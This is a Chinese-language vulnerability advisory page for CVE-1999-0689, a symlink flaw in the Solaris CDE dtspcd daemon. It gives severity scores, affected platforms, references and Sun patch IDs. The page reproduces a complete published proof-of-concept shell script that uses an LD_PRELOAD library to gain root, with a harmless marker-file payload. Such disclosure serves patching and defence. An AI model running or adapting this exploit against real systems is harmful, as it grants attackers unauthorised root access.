CVE-1999-0689
CVSS7.2
发布时间 :1999-09-13 00:00:00
修订时间 :2008-09-09 08:35:13
NMCOE    

[原文]The CDE dtspcd daemon allows local users to execute arbitrary commands via a symlink attack.


[CNNVD]多厂商CDE dtspcd漏洞(CNNVD-199909-025)

        CDE dtspcd守护程序存在漏洞。本地用户可以借助符号链接执行任意命令。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:cde:cde:1.2
cpe:/a:cde:cde:2.0
cpe:/a:cde:cde:1.0.2
cpe:/o:sun:solaris:2.5::x86
cpe:/o:sun:solaris:2.5
cpe:/a:cde:cde:1.0.1
cpe:/o:sun:solaris:2.6
cpe:/o:sun:solaris:7.0::x86
cpe:/o:sun:solaris:7.0
cpe:/a:cde:cde:2.120
cpe:/o:sun:solaris:2.6::x86
cpe:/a:cde:cde:2.1
cpe:/o:sun:solaris:2.5.1::x86
cpe:/o:sun:solaris:2.5.1
cpe:/a:cde:cde:1.1

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:1880CDE dtspcd Daemon Symlink Vulnerability
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0689
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0689
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199909-025
(官方数据源) CNNVD

- 其它链接及资源

http://www1.itrc.hp.com/service/cki/docDisplay.do?docId=HPSBUX9909-103
(UNKNOWN)  HP  HPSBUX9909-103
http://www.securityfocus.com/bid/636
(UNKNOWN)  BID  636
http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=secbull/192
(UNKNOWN)  SUN  00192

- 漏洞信息

多厂商CDE dtspcd漏洞
高危 其他
1999-09-13 00:00:00 2005-05-02 00:00:00
本地  
        CDE dtspcd守护程序存在漏洞。本地用户可以借助符号链接执行任意命令。

- 公告与补丁

        Updated SGI advisory (20021102-02-P) and fix details available.
        Sun Micosystems
        ------------------------
        CDE versionPatch ID
        ___________ _________
        1.3sparc108221-01
        1.3x86108222-01
        1.2 sparc108199-01
        1.2_x86x86108200-01
        1.0.sparc108205-01
        1.0.2x86108206-01
         1.0.1sparc108252-01
         1.0.1x86108253-01
        Patches are available for all Sun customers at
        http://sunsolve.sun.com.
        Sun Solaris 2.5
        

  •         Sun 108252-01
            

  •         

        Sun Solaris 2.5 _x86
        

  •         Sun 108253-01
            

  •         

        Sun Solaris 2.5.1 _x86
        

  •         Sun 108206-01
            

  •         

        Sun Solaris 2.5.1
        

  •         Sun 108205-01
            

  •         

        Sun Solaris 2.6
        

  •         Sun 108199-01
            

  •         

        Sun Solaris 2.6 _x86
        

  •         Sun 108200-01
            

  •         

        Sun Solaris 7.0
        

  •         Sun 108221-01
            

  •         

        Sun Solaris 7.0 _x86
        

  •         Sun 108222-01
            

  •         

- 漏洞信息 (19498)

Common Desktop Environment <= 2.1 20,Solaris <= 7.0 dtspcd Vulnerability (EDBID:19498)
multiple local
1999-09-13 Verified
0 Job de Haas of ITSX
N/A [点击下载]
source: http://www.securityfocus.com/bid/636/info

This explanation is quoted from the initial post on this problem by Job De Hass. This message is available in its entirety in the 'Credit' section of this vulnerability entry.

The CDE subprocess daemon /usr/dt/bin/dtspcd contains an insufficient check on client credentials. The CDE subprocess daemon allows cross-platform invocation of applications. In order to authenticate the remote user, the daemon generates a filename which is to be created by the client and then is verified by the daemon. When verifying the created file, the daemon uses stat() instead of lstat() and is subsequently vulnerable to a symlink attack. Further more the daemon seems to allow empty usernames and then reverts to a publicly write-able directory (/var/dt/tmp). 

#!/bin/sh
#
# dtspaced
# Demonstration of local root hole with dtspcd.
# Job de Haas
# (c) 1999 ITSX bv
#
# Mechanism is as follows:
# - dtaction requests the action 'Execute' through dtspcd.
# - dtscpd request a filename to be created which it will check for
# owner/suid bit.
# - BUG1: dtspcd allows creation in a public directory (with empty
# username).
# - BUG2: and forgets to check if the file is a symlink.
# - dtaction will create a symlink to a suid root binary and reply.
# - dtspcd considers dtaction authenticated and executes requested file
# as root.
#
# suggested fix: use lstat or refuse a symlink and why allow an empty
# username?
#
# exploit uses a shared lib to replace some functions to do what we want.
# Note that these are not used by dtspcd but by dtaction. The script executed
# by dtaction as root creates a file /tmp/root_was_here.
#
# tested on Solaris 2.5.1, 2.6 and 7
#

if [ -f /tmp/root_was_here -o -d /tmp/root_was_here ]; then
echo "/tmp/root_was_here already exists"
exit
fi

if [ "X$DISPLAY" = "X" ]; then
echo "need to set DISPLAY"
exit
fi

cat > /tmp/dtspaced.c << EOF
#include <pwd.h>
#define O_CREAT 0x100
#define O_RDONLY 0

#if __SunOS_5_5_1
#define open64 open
#define _open64 _open
#endif

open64(const char * filename, int flag, int mode)
{
if ((flag & O_CREAT) && ( strstr( filename, "SPC") )) {
symlink( "/usr/bin/passwd", filename);
filename = (char *)strdup("/tmp/shit");
unlink(filename);
}
return(_open64(filename, flag, mode));
}

chmod(const char * filename, int mode)
{
_chmod( filename, mode);
return(0);
}

struct passwd *getpwuid(uid_t uid)
{
struct passwd *pw;

pw = (struct passwd *)_getpwuid(uid);
pw->pw_name = (char *)strdup("");
return(pw);
}
EOF

cat > /tmp/doit << EOF
#!/bin/sh
unset LD_PRELOAD
/usr/bin/touch /tmp/root_was_here
EOF

chmod a+x /tmp/doit

mkdir /tmp/.dt
cat > /tmp/.dt/hack.dt << EOF

set DtDbVersion=1.0

ACTION Execute
{
LABEL Execute
TYPE COMMAND
WINDOW_TYPE NO_STDIO
EXEC_STRING "%(File)Arg_1"File To Execute:"%"
DESCRIPTION The Execute action runs a shell script or binary executable. It prompts for options and arguments, and then executes the script or executable in a terminal window.
}
EOF

DTDATABASESEARCHPATH=/tmp/.dt
export DTDATABASESEARCHPATH

# make a copy of dtaction so it is not suid root and will accept LD_PRELOAD
cp /usr/dt/bin/dtaction /tmp

echo "Compiling shared lib..."
cc -c /tmp/dtspaced.c -o /tmp/dtspaced.o
ld -G /tmp/dtspaced.o -o /tmp/dtspaced.so

LD_PRELOAD=/tmp/dtspaced.so
export LD_PRELOAD

echo "Executing dtaction..."
/tmp/dtaction -execHost 127.0.0.1 Execute /tmp/doit
unset LD_PRELOAD

/bin/rm -f /tmp/doit /tmp/dtaction /tmp/shit /tmp/dtspaced.*
/bin/rm -rf /tmp/.dt

if [ -f /tmp/root_was_here ]; then
echo "created file /tmp/root_was_here"
else
echo "exploit failed..."
fi 		

- 漏洞信息

1072
Multiple Vendor CDE dtspcd Symlink Arbitrary Privileged Command Execution
Local Access Required Race Condition
Loss of Integrity Patch / RCS
Exploit Public Vendor Verified

- 漏洞描述

- 时间线

1999-09-13 Unknow
Unknow Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, multiple vendors have released patches to address this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站